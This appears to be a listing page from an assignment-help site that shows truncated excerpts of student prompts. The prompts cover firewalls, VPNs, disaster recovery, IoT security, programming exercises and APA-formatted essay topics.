  • Here is a questionnaire for you to take on your “Change Readiness”. Provide feedback on how it relates to you - Here is a questionnaire for you to take on your "Change Readiness". Provide feedback on how it relates to you and your style. *** Assume your self as a software engineer/developer and take the questionnaire. Based on the results write the discussion initial post.  http://www.ecfvp.org/files/uploads/2_-change_readiness_assessment_0426111.pdf You will be writing three or more discussion posts per week. Your main post must be two to three substantive paragraphs (250 total words) and include at least one APA-formatted external citation/reference. Please follow up with two subsequent replies to colleagues. Each reply should consist of a relevant paragraph containing 50 words or more. Your posts should be substantive, demonstrate independent thought relevant to the topic, and encourage continued discussion. Please avoid simply repeating previous posts and agreeing. Provide supporting evidence for your ideas and opinions through the use of personal or work examples, relevant articles or websites, or concepts covered in the week’s readings. Please answer the below questions   12.1 List three design goals for a firewall. 12.2 List four techniques used Please answer the below questions   12.1 List three design goals for a firewall. 12.2 List four techniques used by firewalls to control access and enforce a security policy. 12.3 What information is used by a typical packet filtering firewall? 12.4 What are some weaknesses of a packet filtering firewall? 12.5 What is the difference between a packet filtering firewall and a stateful inspection firewall? 12.6 What is an application-level gateway? 12.7 What is a circuit-level gateway? 12.9 What are the common characteristics of a bastion host? 12.10 Why is it useful to have host-based firewalls? 12.11 What is a DMZ network and what types of systems would you expect to find on such networks? 12.12 What is the difference between an internal and an external firewall? Hello, i need this paper by 07/29 afternoon. Strictly No plagiarism please use your own words. Discuss  500 words or more discuss why Hello, i need this paper by 07/29 afternoon. Strictly No plagiarism please use your own words. Discuss  500 words or more discuss why Security as a Service is a good investment.…

    Here is a questionnaire for you to take on your “Change Readiness”. Provide feedback on how it relates to you Read More »

  • What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also - What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also provide protection for mobile devices? If you do use a VPN, which one and why did you select that particular one?  The post should be in a 750-word limit. must and should be in APA format with references and citations. Plagiarism free. - Discuss your understanding of the disaster recovery plan, and how it works in concert with an organization's business continuity - Discuss your understanding of the disaster recovery plan, and how it works in concert with an organization's business continuity plan. - Discuss your understanding of recovery time objectives used in the disaster recovery plan, to include critical success factors that must be taken into consideration to ensure successful restoration. - Connect the dots:  Explain how the disaster recovery plan's purpose to mitigate risk work in concert with the overall risk management plan. - Discuss some best practices that you have found during personal research relating to the successful implementation of a disaster recovery plan. 1. If you were going to start a new technology business, which of the emerging trends do you think would 1. If you were going to start a new technology business, which of the emerging trends do you think would be the biggest opportunity? Do some original research to estimate the market size.  2. What privacy concerns could be raised by collaborative technologies such as Waze?  4. Write up an example of how IoT might provide a business with a competitive advantage.  Textbook Link:  https://opentextbook.site/informationsystems2019/chapter/chapter-13-future-trends-in-information-systems-information-systems-introduction/  Note: Each question must be answered in 7 lines and must include refrences The departure lounge at a certain airport has 8 seats altogether, Question The departure lounge at a certain airport has 8 seats altogether, four on each side. In how many ways can 6 boys and 2 girls sit if a) the girls are to sit directly opposite each other? Answer =Answer [1 mark] (b) the girls should not sit next to each other? Answer=Answer [2 marks] Discussion 1 Crypto  Write 500 words that respond to…

    What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also Read More »

  • For this assignment, you will need to perform a qualitative analysis on the below scenario.  Please write your response in - For this assignment, you will need to perform a qualitative analysis on the below scenario.  Please write your response in a spreadsheet. Qualitative Analysis For this part of the assignment, you can use the work you performed for last week.  Take those 7 risks and arrange them into a spreadsheet.  Perform a probability assessment and write about the impact of the risk for each of the 7, based on the geographical location of last week's assignment.  Use the following format: *****See the attachment for the format***** Misleading Data Project Directions: Explain why you think the data visualizations could be misleading.  There are four prompts (data visualizations)  Each prompt Misleading Data Project Directions: Explain why you think the data visualizations could be misleading.  There are four prompts (data visualizations)  Each prompt (added in the attachment) should be addressed and completed in a minimum of 200 words.  Citations are not required for this assignment but be sure to include as much detail as possible to illustrate your thinking. The Assessment is available as an attached word for reference. Complete your assessment using the downloadable assessment document and submit your completed assessment. An  organization should establish an effective cybersecurity training  program for personnel having authorized access to critical cyber assets. Create  a training An  organization should establish an effective cybersecurity training  program for personnel having authorized access to critical cyber assets. Create  a training plan for everyone who works at the organization. The  training plan should address (but is not limited to) the following: Articulate a culture of security awareness, collaboration, and buy-in among management, staff, clients, and stakeholders.   Describe common security risks and how to avoid them.   Describe policies, access controls, and procedures developed for critical electronic devices and communication networks.   Describe the proper use of critical electronic devices and communication networks.   Describe the proper handling of critical information.   Present action plans and procedures to recover or reestablish critical electronic devices and communication networks.   Address the risks resulting from insecure behavior of employees. You have been asked by management (manufacturing, healthcare, retail, financial, and etc. )…

    For this assignment, you will need to perform a qualitative analysis on the below scenario.  Please write your response in Read More »

  • your ceo calls you into her office to discuss the recent drop in sales she would like your recommendation regarding - your ceo calls you into her office to discuss the recent drop in sales she would like your recommendation regarding how it might be used to generate an increase in sales  identity and discuss it application and technology that you might recommended to a small  company to help it survive and succeed in challenging economic times ? you need to cite from the required textbooks , please include page numbers In this module, you learned that random numbers (or, at least, pseudorandom numbers) are essential in cryptography, but it is In this module, you learned that random numbers (or, at least, pseudorandom numbers) are essential in cryptography, but it is extremely difficult even for powerful hardware and software to generate them. Go online and conduct research on random number generators. What are the different uses of these tools besides cryptography? How do they work? Explain your answer using your own words in 2-3 paragraphs. The scenario:  Success Gardens is planning to feature a garden club each week on its show and wants to invite garden The scenario:  Success Gardens is planning to feature a garden club each week on its show and wants to invite garden clubs to apply. You have been asked to update the contact information for the clubs in a database, modify a form including the contact information, and then create individualized letters and envelopes using mail merge. For this assignment, you will need the following files:     New blank Word document     Garden_Clubs     Club_Information     Contacts_Letter You will save your files as:     Lastname_Firstname_Garden_Clubs     Lastname_Firstname_Club_Information     Lastname_Firstname_Contacts_Letter     Lastname_Firstname_Club_Letters     Lastname_Firstname_Club_Envelopes Part 1 Open the Garden_Clubs database, and save it as Lastname_Firstname_Garden_Clubs Create a form based on the Garden Clubs table, and save the form as Lastname Firstname Clubs Form Enter the information below, using your First Name and Last Name for the last record. Update the Address Field for the Evergreen Gardeners to 4525 Center Ave Delete the record for Velvet Gloves. In the table, apply Best Fit to all columns. Club Name First Name Last Name Address City State ZIP Phone E-mail…

    your ceo calls you into her office to discuss the recent drop in sales she would like your recommendation regarding Read More »

  • CST 125. Internet and Web Programming Assignment CSS and Color Instruction: Computer Science Assignment Help - Question CST 125. Internet and Web Programming Assignment CSS and Color Instruction: This is a graded assignment built on the previous ungraded exercises.Steps:· Use the web pages created in Exercise 4, create two external CSS files to change the colors on your web pageso Name one file styles.csso Name the other file styles-alt.css· Change the appearance using a minimum of two selectors: o Use the body selector with the background-color declaration to change the background color of your pageso Use the class selector to change the color of the text for elements that match the class name· Use the tag on your web pages to reference the CSS file so the styles will be applied to your websiteSubmitting Assignments for Grading.Put all your files in a folder, zip it and submit the zipped file.If you are using a recent version of Microsoft windows, you can create the ZIP file (compressed folder) by creating a new folder anywhere in your computer's file system and putting the files in that folder. Then right-click on the folder and select "Send to" and then "compressed (zipped) folder". Alternatively, you can use a program such as WinZIP (winzip.com).Your instructor will assess every part of your submissionHave the instructions been followedIs the HTML easily understandableIs anything that is not clear clearly documentedBy renaming styles.css to styles1.css, renaming styles-alt.css to styles.css, and refreshing their browser, do the new styles take effect· Your possible grades are:o A: You impressed on the first try.o B: You impressed on the second try.o C: You got it done, but it was not impressive.o F: You didn't get it done on your third try. ''' Breadth First and Depth First Search The objective is to create a Python program that traverses graphs in BFS Question ''' Breadth First and Depth First Search The objective is to create a Python program that traverses graphs in BFS and DFS manner. BFS will determine the shortest path distance (number ofedges) from the root for each node reachable from the root. DFS will findcycles in the graph of nodes reachable from the root. Study the lecture…

    CST 125. Internet and Web Programming Assignment CSS and Color Instruction: Computer Science Assignment Help Read More »

  • 1)Write an assembly language program to find out the product of two - Question 1)Write an assembly language program to find out the product of two arrays of 8-bit n numbers, where size "n" is stored at offset 600 and the numbers of first array are stored from offset 601 and the numbers of second array are stored from offset 701 and store the result numbers into first array i.e. offset 601? It turns out that Alpha Beta Gamma has a psychology division. Currently, Question Get Answer It turns out that Alpha Beta Gamma has a psychology division. Currently, they are performing experiments on groups of students at various schools. A subgroup of students is a clique if every pair of students in the subgroup are friends. At each school, the psyhologists must find two cliques of students; no student may be in both cliques (although a student in one clique can be friends with everyone in the other clique). The value of a student is an integer from 1 to 10. The value of an experiment (at a school) is the sum of the values of all of the students in the two cliques. The psychologists go to a school to choose students for the experiment. They have in mind some target for the value of the experiment. If the value does not meet the target, the experiment is not worth doing. The psychologists interview and test the students to determine each student's value and collect data on their friendships. Then the psychologists check if the students at the school can be put into two cliques so that the experiment will meet (or exceed) the target. If so, they then find out how to form two cliques of students from the school with maximum total value.There are two computational problems the psychologists must solve:A. Given a set of students with their values and friendships, and a target T , determine if there are two independent cliques of students with total value at least T . This is a YES/NO question.B. Given a set of students with their values and friendships, find two independent cliques of students with largest possible total value. These…

    1)Write an assembly language program to find out the product of two Read More »

  • Lab 5 : ArraysPlease the attachment which is been given to Develop - Question Lab 5 : ArraysPlease the attachment which is been given to Develop a C code that asks for a class size (maximum can be 20).Then it asks the user to enter all the marks and saves them in an array.Then it generates a report about the class status that includes the following1- Class average2- Best mark and worst mark3- number of failed students4- Number of students with a grade of A and higher (80 or above)5- number of students who got a mark above average Enterprises are accumulating substantial amounts of data that are necessary for their business operations. As the quantities of data Question Enterprises are accumulating substantial amounts of data that are necessary for their business operations. As the quantities of data increase and the systems and processes used to manage these data become more complex, enterprises need better management of the content. The term enterprise content management (ECM) is used to describe this management process. For this discussion, research the library and Internet for information about ECM, and respond to the following questions: -Why do you think ECM is important to an organization? -What aspect of ECM is most influential to the health of an organization, and why? -Select 1 area of ECM, and discuss the importance of this area to the effective management of content in an organization. Structured analysis uses an overall plan that consists of a series Question Structured analysis uses an overall plan that consists of a series of phases. Although, all of the phases are important, which phase do you think is the most imperative to systems development? How have you used that specific phase in your career already? If you have not utilized the phase yet, how could you in your future? Exercise #1 - Grab bag Here is a text file with a series of sentences, one per line; Question Get Answer Exercise #1 - Grab bag Here is a text file with a series of sentences, one per line; This is a good idea What about this? this goes here... ...here goes this Middle of this... In java…

    Lab 5 : ArraysPlease the attachment which is been given to Develop Read More »

  • The diagram describes a simple database for a small clinic. It - Question Get Answer The diagram describes a simple database for a small clinic. It includes tables with information about Physicians, Patients, Consultations, Medicine, Clinical Testing and Follow Up. Every Physician, Patient, Medicine, and Clinical Testing in the system contains a record within their corresponding Table. Every time a patient visits a physician, a unique consultation record is created. After the consultation ends, a set of RequestedClinicalTests may be ordered, Medication for Patients may be filled and FollowUp records may also be created. Assume that the fields named Salary, Dosage, Quantity, and UnitCost are the only numeric fields in the database. All other fields are strings (TEXT). The fields Date and DOB can be transformed to the format MM-DD-YYYY ('01-31-1950', for example) by using the function Format( Progress Report 3: Note: This Progress Report WILL BE graded. Question Progress Report 3: Note: This Progress Report WILL BE graded. In this progress report, you will be focusing on allowing one of the four transactions listed below to be completed by the user on one of his accounts: checking or savings. You will include defensive programming and error checking to ensure your program functions like an ATM machine would. The account details for your customer are as follows: For this progress report, update the Progress Report 2 Raptor program that allows the account owner to complete one of the 5 functions of the ATM: 1 - Deposit (adding money to the account)2 - Withdrawal (removing money from the account)3 - Balance Inquiry (check current balance)4 - Transfer Balance (transfer balance from one account to another)5 - Log Out (exits/ends the program) After a transaction is completed, the program will update the running balance and give the customer a detailed description of the transaction. A customer cannot overdraft on their account; if they try to withdraw more money than there is, a warning will be given to the customer. Also note that the ATM doesn't distribute or collect coins - all monetary values are in whole dollars (e.g. an integer is an acceptable variable type). Any incorrect transaction types will display an appropriate message…

    The diagram describes a simple database for a small clinic. It Read More »

  • You have been hired to clean up the streets of Boston using your street - Question You have been hired to clean up the streets of Boston using your street sweeper. In order to do the job for the lowest cost, you want to devise a way to sweep each street exactly one time in each direction. That is, for each street, you go up the street once and down the street once to sweep eachside of the road. Assume all roads are two-way streets. Specifically, your city is modeled as a graph G = (V ;E), where the vertices represent the intersections and edges represent the roads connecting intersections. Design an algorithm based on depth-first search that takes the graph G = (V ;E) and finds a street-sweeping route that goes alongeach edge exactly once in each direction. Your algorithm should run in O(V E) time.(a) (8 points) Explain in a few English sentences how your algorithm works.Solution:(b) (8 points) Describe your algorithm in pseudocode.Solution:(c) (8 points) Justify that your algorithm finds a correct street-sweeping route. Your justification may take any form you like, as long as it is clear and convincing.Solution:(d) (6 points) Analyze the running time of your algorithm.Solution: The COSO framework of internal controls is practiced within companies around the world. The objectives of the COSO framework are The COSO framework of internal controls is practiced within companies around the world. The objectives of the COSO framework are closely related to its five components. For this week’s activity, please discuss these five components of the COSO framework. Be sure to include each components’ impact on each of the COSO framework objectives. What do you feel an auditor would most be concerned with during an IT audit? Lastly, discuss suggestions for integrating COSO framework compliance into a company in which you are familiar.  Your paper should meet the following requirements: • Be approximately 2-4 pages in length, not including the required cover page and reference page. • Follow APA6 guidelines. Your paper should include an introduction, a body with fully developed content, and a conclusion. • Support your answers with the readings from the course and at least two scholarly journal articles…

    You have been hired to clean up the streets of Boston using your street Read More »

  • The Term Project assignment offers the opportunity to explore/research a specific topic in computer systems in-depth and present your findings - The Term Project assignment offers the opportunity to explore/research a specific topic in computer systems in-depth and present your findings in the form of a written report.  Your term project must be 5-10 pages not including a cover page and reference section of at least 5 peer- reviewed articles. This assignment must follow APA style, 12 Font, and Double Spaced. The topic selected should include a comprehensive assessment of the basics of Computers, the role in which they play and the needs of an organization and/or person as it relates to your selected topic.  1. Describe systems at risk, data breaches, the need for disaster recovery, and how data centers fit into this equation. Use of the cloud for data storage has grown exponentially. Picking some of the topics in Chapter 16, find an article Use of the cloud for data storage has grown exponentially. Picking some of the topics in Chapter 16, find an article that discusses cloud security and/ or data breaches  Discuss how the company approached the problem or what they should have had in place based on the NIST standards. Post should have 800 words with atleast 3 references and cited with APA format.NO PLAGIARISM. Attached the text book. Q1 A software house has been asked to develop a simple web system based on a three-tier architecture (and a client-server Q1 A software house has been asked to develop a simple web system based on a three-tier architecture (and a client-server architecture) for mobile banking. The system allows bank account holders to: 1. Check the current account balance 2. Show the list of the last five transactions 3. Pay into another bank account up to £500 per day if funds are available The SW project manager has decided that each of the above requirements would correspond to a specific software component that represents a partition of the three-tier architecture into various modules, each with its own GUI, its own portion of business logic, and its own set of SQL queries to the external bank database. The project manager would like to use an Agile approach and…

    The Term Project assignment offers the opportunity to explore/research a specific topic in computer systems in-depth and present your findings Read More »

  • Students will create a Disaster Recovery Plan for either the organization they work for or one they wish to work Computer Science Assignment Help - Students will create a Disaster Recovery Plan for either the organization they work for or one they wish to work for in the future.  The plan will follow the template/example provided.  Student should request prior authorization of company to be addressed to ensure that all students are working on unique companies. After completing the reading this week, we reflect on a few key concepts this week: Discuss what ethical leadership After completing the reading this week, we reflect on a few key concepts this week: Discuss what ethical leadership is and how it impacts the organizational culture. What are the various dimensions of ethical leadership? Note some failures in ethical leadership, please find an example, explain the failure and note possible solutions to fix the issue with leadership. Please be sure to answer all the questions above in the initial post. Please ensure the initial post and two response posts are substantive.  Substantive posts will do at least TWO of the following: Ask an interesting, thoughtful question pertaining to the topic Expand on the topic, by adding additional thoughtful information Answer a question posted by another student in detail Share an applicable personal experience Provide an outside source Make an argument   Required Reading Chapter 5 in the text LE BA PHONG, LEI HUI, Topic- Security Issues with IoT Based Smart Home Devices Annotated Bibliographies related with your project selected topic Details pls go through Required assignment doc and attached Annotated Bibliographies related with your project selected topic. Topic-  Security Issues with IoT Based Smart Home Devices     VERY IMPORTANT NOTE 1- You need to follow the format based on attached file. 2- You need to tell me which MIS journal publishing using along with URL. 3- ONLY” Peer-Reviewed Journals. Do not use any other source to support your research. Use only Peer-Reviewed Journals.  4- Which peer review approval you are using I need each PDF url. Max 2 to 3 would be fine.  5- Annotated Bibliographies (File attached). 6- Use generic security issues on smart home devices but elaborate for a one with details in next page. Tasks Given…

    Students will create a Disaster Recovery Plan for either the organization they work for or one they wish to work Computer Science Assignment Help Read More »

  • Transformational leadership and knowledge sharing within an organization, please review these concepts and answer the following questions: How do - Transformational leadership and knowledge sharing within an organization, please review these concepts and answer the following questions: How do trustworthy and ethical leaders enhance knowledge sharing in organizations?  How does this impact the rate of information technology implementations?  How does this impact data management within organizations?  How does servant leadership assist with transferring knowledge in an organization? When thinking about data analytics, how does transformational leadership assist with building good data structures? Google Scholar is also a great source for research.  Please be sure that journal articles are peer-reviewed and are published within the last five years. The paper should meet the following requirements: 3 pages in length (not including title page or references) APA guidelines must be followed.  The paper must include a cover page, an introduction, a body with fully developed content, and a conclusion. A minimum of five peer-reviewed journal articles. The writing should be clear and concise.  Headings should be used to transition thoughts.  Don’t forget that the grade also includes the quality of writing. In 500 words or more, compare DNS failover and cloud failover.  Use at least three sources. Use the Research Databases available from the Danforth Library not In 500 words or more, compare DNS failover and cloud failover.  Use at least three sources. Use the Research Databases available from the Danforth Library not Google. Include at least 3 quotes from your sources enclosed in quotation marks and cited in-line by reference to your reference list.  Example: "words you copied" (citation) These quotes should be one full sentence not altered or paraphrased. Cite your sources using APA format. Use the quotes in your paragaphs.  Stand alone quotes will not count toward the 3 required quotes. Copying without attribution or the use of spinbot or other word substitution software will result in a grade of 0.  Write in essay format not in bulleted, numbered or other list format. In the textbook, Systems Analysis and Design in a Changing World, refer to the RMO CSMS marketing subsystem Figure 3-10d In the textbook, Systems Analysis and Design in a Changing World, refer to the RMO CSMS marketing subsystem Figure 3-10d on page 83. Write a paper in which you…

    Transformational leadership and knowledge sharing within an organization, please review these concepts and answer the following questions: How do Read More »

  • The following resources may be helpful when completing this assignment. Dearden, A. (2008). User-Centered Design Considered Harmful Norman, - The following resources may be helpful when completing this assignment. Dearden, A. (2008). User-Centered Design Considered Harmful Norman, D. (2007–2010). Activity-Centered Design: Why I like my Harmony Remote Control Computer applications that run on desktop and laptop computers have, for a long time, been designed to be driven by dragging and clicking a mouse. With the introduction of tablet personal computers, the trend has shifted toward using touch-based screens. We now have access to touch-based TVs, touch-based monitors, touch-based laptops and touch-based tablets. Touch and multi-touch devices provide end users with the ability to interact physically with an application much more naturally. Imagine that you are the Information Technology Director of a major chain restaurant, and you have been assigned to design a menu ordering application that can run on all devices. Examine whether using a touch-screen monitor, a tablet, or using a mouse to select menu items to place an order would be most efficient. Speculate how employees would interact with these devices and the type of emotional reaction that customers and employees will experience while placing a beverage, appetizer or entrée order. Write a four to five (4-5) page paper in which you: Differentiate between the interaction types and styles that apply to multi-touch screens and applications running on them. Determine the conceptual model that you would use when designing a product for your restaurant. Describe the key analogies and concepts these monitors expose to users, including the task-domain objects users manipulate on the screen. Determine one (1) utility / tool in an application for touch-based and mouse-drive screens that should be designed with memory retention / recall. Provide a rationale for your response. Use at least three (3) quality resources in this assignment. Note: Wikipedia and similar Websites do not qualify as quality resources. You may use the resources above or others of your choosing. Format your assignment according to the following formatting requirements: This course requires use of new Strayer Writing Standards (SWS). The format is different from other Strayer University courses. Please take a moment to review the SWS documentation for details. Typed, double-spaced, using…

    The following resources may be helpful when completing this assignment. Dearden, A. (2008). User-Centered Design Considered Harmful Norman, Read More »

  • Please identify a computer system you have recently had experience with (at home, work,etc.); prepare an attached PowerPoint presentation (minimum - Please identify a computer system you have recently had experience with (at home, work,etc.); prepare an attached PowerPoint presentation (minimum 8 slides) describing a potential computer security problem related to that system. The target audience is a manager who you are trying to convince to investigate the potential security issues.    Suggestions: Begin with a description of the organization and the computer system you have chosen. Where necessary, you may make assumptions about any specifics – please note these as such in your presentation notes. Draw from the assigned readings (and your independent research) to identify what topics should be included. If you feel that slide information is not self-explanatory, add additional details in the presentation notes. How will smart contracts prevent “over-serving?”  Minimum of 500 words. APA format. Material:   Read: 7 Cool Ways Marketers and Advertisers Can Use How will smart contracts prevent “over-serving?”  Minimum of 500 words. APA format. Material:   Read: 7 Cool Ways Marketers and Advertisers Can Use Blockchain and Cryptocurrencies  https://www.cryptomorrow.com/2018/04/17/blockchain-and-crypto-for-advertisers/ Marketing Data Blockchain: The Next Big Leap https://www.resulticks.com/gartnerdmc/downloads/Resulticks_Blockchain-whitepaper.pdf IoT (Internet of Things) powered by Blockchain: How Blockchains facilitate the application of digital twins in IoT https://www2.deloitte.com/content/dam/Deloitte/de/Documents/Innovation/IoT-powered-by-Blockchain-Deloitte.pdf The Potential Impact of Blockchain Technology on Ecommerce https://blog.salesandorders.com/blockchain-technology-ecommerce Watch: YouTube: What's wrong with Adtech and how the Blockchain could fix it YouTube: How is Blockchain going to improve the digital advertising and supply chain? YouTube: What are Smart Contracts on the Blockchain - Part 1 YouTube: What are Smart Contracts Part 3: Blockchain Limitations and Adoption Need a 2500 words paper on cloud computing. The paper should be APA formatted with the below list. 1)  Chapter 1 Need a 2500 words paper on cloud computing. The paper should be APA formatted with the below list. 1)  Chapter 1 – Introduction 2)  Chapter 2 – Literature Review 3)  Chapter 3 – Methodology Specifics (comparative analysis) 4)  Chapter 4 – Findings and Results 5)  Chapter 5 – Conclusion and Future Recommendations 6)  References - APA 7)  Appendices I have attached a detailed document with the exact requirements. Select one type of cryptography or encryption and explain it in detail. Include the benefits as well as the limitations Select one type…

    Please identify a computer system you have recently had experience with (at home, work,etc.); prepare an attached PowerPoint presentation (minimum Read More »

  • Note: In MS Word 2010, Click Review – Restrict Editing – Stop Protection and remove all highlighted material after completing - Note: In MS Word 2010, Click Review – Restrict Editing – Stop Protection and remove all highlighted material after completing the form PRELIMINARY INVESTIGATION REPORT Subject:       Date:       INTRODUCTION [Provide a brief description of the system, the name of the person or group who performed the investigation, and the name of the person or group who initiated the investigation.]       SYSTEMS REQUEST SUMMARY [Explain the basis of the systems request, including an explanation of major problems or opportunities mentioned in the request.]       PRELIMINARY INVESTIGATION FINDINGS [Describe the results of the investigation, including the scope of the proposed project and the conclusions that were reached. Mention all significant findings, including the results of interviews and other fact-finding, and provide an estimate of current costs.]       RECOMMENDATIONS [Present a specific recommendation for further action.]       TIME AND COST ESTIMATES [Include an estimate of time and expenses necessary for additional IT department work. This should be quite specific for the next phase and should include a timetable and cost estimate for the entire project.]       EXPECTED BENEFITS [Explain all tangible benefits, with specific dollar estimates, using a range if appropriate. Also mention any intangible benefits.] discuss one technology that might be suitable for tracking elderly Question discuss one technology that might be suitable for tracking elderly people indoors and one technology that might be suitable for tracking elderly people outdoors. Be sure to highlight how each of your chosen technologies might be used in each context. Explain at least one issue that might arise with one of your chosen technologies. Compare real world scenarios in at least two different sectors (such Question Compare real world scenarios in at least two different sectors (such as healthcare sector, smart vehicles, smart agricultural sector etc) where "Internet of things" has played a remarkable role in enhancing the already prevalent technologies. Outline various issues (at least two issues), give in-depth discussion and provide their solutions in different IoT domains. One example is to discuss trust management issues in Social Internet of Things. Students can also consider the merging of different technologies (such as blockchain and…

    Note: In MS Word 2010, Click Review – Restrict Editing – Stop Protection and remove all highlighted material after completing Read More »

  • Q : A coffee shop in Johar Town has been granted a set of IP addresses - Question Q : A coffee shop in Johar Town has been granted a set of IP addresses beginning from 120.60.4.0/22. The owner of the shop wants to allocate these set of IP addresses to 100 groups with each group receiving just eight addresses. Design the sub-blocks and give the slash notation for each sub-block. Find out how many addresses are still available after these allocations. PythonA function named file_sum that takes as a parameter the Question PythonA function named file_sum that takes as a parameter the name of a text file that contains a list of numbers, one to a line, like this:23.77 116 94 -12.8 0 14.999 The function should sum the values in the file and write the sum (just that number) to a text file name sum.txt. Get Answer 001,0B7,022,000,0B7,056,0B5,003The processor access the data listed above sequentially for two times. Show the tag and set number Question Get Answer 001,0B7,022,000,0B7,056,0B5,003The processor access the data listed above sequentially for two times. Show the tag and set number for the final cache contents for a two-way set associative cache with two-byte blocks and a total size of 16 bytes. Use LRU replacement. What are the hit and miss rate for the data access? The cache is empty initially. Show the steps to obtain the tag and set number. Run through the following sorting algorithm and determine the largest number. Question Run through the following sorting algorithm and determine the largest number. Assume at the start of this sequence the variables are set as follows:List_Size = 5Num-1 = 6Num-2 = 8Num-3 = 5Num-4 = 16Num-5 = 18STEP 1 Set Largest# to Num-1STEP 2 If Largest# < Num-2 Then Set Largest# to Num-2 and Go To Step 3 Largest# after Step 2 = Term 1 Else Go To Step 3STEP 3 If Largest# < Num-3 Then Set Largest# to Num-3 and Go To Step 4 Largest# after Step 3 = Term 2 Else Go To Step 4STEP 4 If Largest# < Num-4 Then Set Largest# to Num-4 and Go To Step 5 Largest# after Step 4 = Term 3 Else Go…

    Q : A coffee shop in Johar Town has been granted a set of IP addresses Read More »

  • The following assembly program (which has line reference numbers attached Computer Science Assignment Help - Question The following assembly program (which has line reference numbers attached to help you answer the questions below) will begin executing at location 0. 0 lodd start:1 stod 40932 stod 40953 top: lodd 40954 subd mask:5 jneg top6 print lodd char:7 stod 40948 addd c4:9 stod char:10 subd chlim:11 jneg cont:12 lodd chA:13 stod char:14 cont: lodd 409315 subd mask:16 jneg top:17 done: halt18 start: 819 mask: 1020 chlim: "Q"21 chA: "A"22 char: "H"23 prompt: "Please type in a positive integer"24 c4: 4What are the first five characters written to the display if there is no input? Write an essay of at least 500 wordsdiscussing IAM in a federated cloud application. Do not copy without providing proper attribution. This paper will be evaluated through SafeAssign.  Write in essay format not in outline, bulleted, numbered or other list format.   Use the five paragraph format. Each paragraph must have at least five sentences. Include 3 quotes with quotation marks and cited in-line and in a list of references. Include an interesting meaninful title. Include at least one quote from each of 3 different articles.  Cite your sources in a clickable reference list at the end. Do not copy without providing proper attribution (quotation marks and in-line citations). QUESTION : Discuss the benefits of virtualization software, as described in the text. Do you agree/disagree with these benefits, or QUESTION : Discuss the benefits of virtualization software, as described in the text. Do you agree/disagree with these benefits, or can you think of additional benefits not already presented? Also discuss the security concerns highlighted by server sprawl and how you would propose to solve those in your (real or hypothetical) organization. INSTRUCTIONS APA FORMAT, 250 words. Please make your post substantive. A substantive post will do at least TWO of the following: Provide extensive additional information on the topic Explain, define, or analyze the topic in detail Share an applicable personal experience Provide an outside source (for example, an article from the UC Library) that applies to the topic, along with additional information about the topic or the source (please cite properly in APA) TEXTBOOK: Pearlson, K., Saunders, C., Galletta,…

    The following assembly program (which has line reference numbers attached Computer Science Assignment Help Read More »

  • Read the Nationstate Case Study on pages 160-164 in the textbook. Answer Discussion Questions 1-2 at the end of the Case - Read the Nationstate Case Study on pages 160-164 in the textbook. Answer Discussion Questions 1-2 at the end of the Case Study. Your responses must be complete, detailed and in APA format. See the sample assignment for expected format and length. The paper MUST BE between 600 - 1200 words (minus the cover page, abstract, graphs, and references). These grading guidelines will be STRICTLY enforced as this is a Master's program where writing is required! By submitting this paper, you agree: (1) that you are submitting your paper to be used and stored as part of the SafeAssign™ services in accordance with the Blackboard Privacy Policy; (2) that your institution may use your paper in accordance with your institution's policies; and (3) that your use of SafeAssign will be without recourse against Blackboard Inc. and its affiliates. - topic "Social networking in the 21th Century" -  paper should have a title page, introduction, well defined literature review (body), - topic "Social networking in the 21th Century" -  paper should have a title page, introduction, well defined literature review (body), findings, conclusion, and reference pages. The paper must be at least 2,500 words.  -  Utilize graphs, charts, tables or figures if it enhances the point(s) you are making.  - 13 pages(excluding reference page) part 1: Project Cost Estimates There are four main types of project cost estimates: analogous, top-down, bottom-up, and parametric. Tom DeMarco, a part 1: Project Cost Estimates There are four main types of project cost estimates: analogous, top-down, bottom-up, and parametric. Tom DeMarco, a well-known author on software development, suggests that there are four typical problems with IT cost estimates: Estimates are done too quickly, people lack estimating experience, human beings are biased towards underestimation, and management desires accuracy (Schwalbe, 2016). Read Chapter 7 in your textbook, as well as the article “Plant Design: How Much?” by Peter Kauders (2014). Then, select one of the main project estimate types, describe it, and discuss which of the cost estimate problems are most likely to occur when it is used. Then, use the information from your readings to describe at least one possible approach…

    Read the Nationstate Case Study on pages 160-164 in the textbook. Answer Discussion Questions 1-2 at the end of the Case Read More »

  • 700 word discussion: After reading the chapter, what are the six (6) critical stages of the policy process? - Chapter Nine (9) – Stakeholder engagement in policy development: Observations and lessons from the international experience: Provides a starting point for a better understanding about how different approaches, tools, and technologies can support effective stakeholder participation in policy development processes.  In addition, we have seen how participatory policy-making involves stakeholders from various stages of the policy process and can focus on both the substance of the policy problem or on improving the tools and processes of policy development.  The chapter examined five (5) international cases of stakeholder engagement in policy development to explore two questions: (a) what types of engagement tools and processes are useful for different stakeholders and contexts? (b) what factors support the effective use of particular tools and technologies for constructive outcomes?  The cases address e-government strategic planning in a developing country, energy policy in a transitional economy, development of new technology and policy innovations in global trade, exploration of tools for policy-relevant evidence in early childhood decision-making, and the development of indicators for evaluating policy options in urban planning (pg 177; para3 – abstract extract). Chapter 9: fig 9.1; Stakeholder Engagement in policy development illustration.  Following this illustration: what are the six (6) critical stages of the policy process? provide a clear narrative that explains what happens at each stage to support your responses. This week’s journal articles focus on transformational leadership and knowledge and knowledge sharing within an organization, please review these concepts This week’s journal articles focus on transformational leadership and knowledge and knowledge sharing within an organization, please review these concepts and answer the following questions: How do trustworthy and ethical leaders enhance knowledge sharing in organizations?  How does this impact the rate of information technology implementations?  How does this impact data management within organizations?  How does servant leadership assist with transferring knowledge in an organization? When thinking about data analytics, how does transformational leadership assist with building good data structures?   Google Scholar is also a great source for research.  Please be sure that journal articles are peer-reviewed and are published within the last five years. The paper should meet the following…

    700 word discussion: After reading the chapter, what are the six (6) critical stages of the policy process? Read More »

